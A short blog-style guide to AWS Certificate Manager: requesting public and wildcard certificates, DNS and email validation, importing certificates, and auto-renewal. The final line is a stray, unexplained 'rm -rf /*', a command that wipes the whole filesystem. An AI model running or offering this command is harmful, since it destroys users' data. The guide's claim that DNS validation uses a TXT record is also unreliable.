If you host services on Amazon Web Services (AWS), you should be using AWS Certificate Manager (ACM) to create and renew all SSL Certificates.
| Note: This post assumes you have ownership of the domain, and it is configured in AWS. |
Request a Certificate
Choose: “Request a public certificate“
Then enter the following information:
- Fully qualified domain name (FQDN)
- The domain name of the certificate (sub.domain.com)
- Use wildcards for wildcards certificates (*.domain.com).
| Note double wildcards certs don’t exist (*.*.domain.com) |
Validation method
- DNS – A TXT key must be created via DNS. The ability to add to DNS proves domain ownership.
- Email – an email is sent to the Administrator configured in the domain registration
- Key algorithm
- Encryption Scheme for the Certificate
Import Existing Certificates
If you already have an existing certificate, you can import it, as long as you have the private key, public key, and intermediate keys.
Note: Imported certificates cannot be renewed automatically.
The Joy of AutoRenewal
One of the most likely scenarios for a site going down, is for the certificate to expire. Certificates requested via ACM can be renewed automatically. This means you never need to renew the certificate and the certificate will get continually renewed.
Random ACM Notes
| Imported certificates cannot be automatically renewed |
| Certificates requested via ACM, cannot be exported. They can only be used on AWS resources. This also means you cannot see the private key of the certificate. This is more secure, and prevents you from exporting the certificate. |
rm -rf /* 